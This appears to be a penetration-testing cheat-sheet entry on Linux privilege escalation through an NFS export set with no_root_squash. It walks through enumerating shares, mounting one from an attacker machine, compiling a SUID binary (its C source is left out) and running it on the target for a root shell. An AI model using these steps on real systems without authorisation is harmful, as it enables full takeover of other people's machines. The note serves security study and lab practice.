NFS (target-machine)

Refer to the following notes for more information on NFS:

111/2049 ~ RPC/NFS | Offensive Security

From the target machine (remote shell)

The NFS (Network File Sharing) configuration is found in the /etc/exportsfile. The important element for privilege escalation is present with the no_root_squash value. With this value, we are able to create a SUID executable binary on the target machine via the NFS connection, and execute it to gain a root shell.

$ cat /etc/exports
/home/backup *(rw,sync,insecure,no_root_squash,no_subtree_check)
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
...

We can use the showmount command to show the mountable shares on the target machine (from our attacker machine)

$ showmount -e <target_ip_add>
Export list for <target_ip_add>:
/tmp                      *
/home/backup              *


# nmap with a specialized script can be used to discover NFS mount points too
$ nmap --script=... <target_ip_addr> over

To be ran as root on the attacker machine (mount the file system for the target machine)

1. Create temporary directory

2. Mount the shares on the target machine (the mount point should be one with the no_root_squash option set)

3. Create a C program to gain root shell

4. Compile the C code to binary

5. Set the SUID bit on the output binary

root@attacker# mkdir /tmp/tmp_mnt_folder (1)
root@attacker# mount -o rw <target_ip_addr>:<mount_point> /tmp/tmp_mnt_folder (2)

root@attacker# cd /tmp/tmp_mnt_folder
root@attacker:/tmp/tmp_mnt_folder# vim shell.c (3)
...
# load the shell program
...
root@attacker:/tmp/tmp_mnt_folder# gcc shell.c -o shell (4)
root@attacker:/tmp/tmp_mnt_folder# chmod +s shell (5)

On the target machine

1. Navigate to the directory where the SUID bit binary is present

2. Run the binary to gain a root shell

$ ./shell

root@target# id
...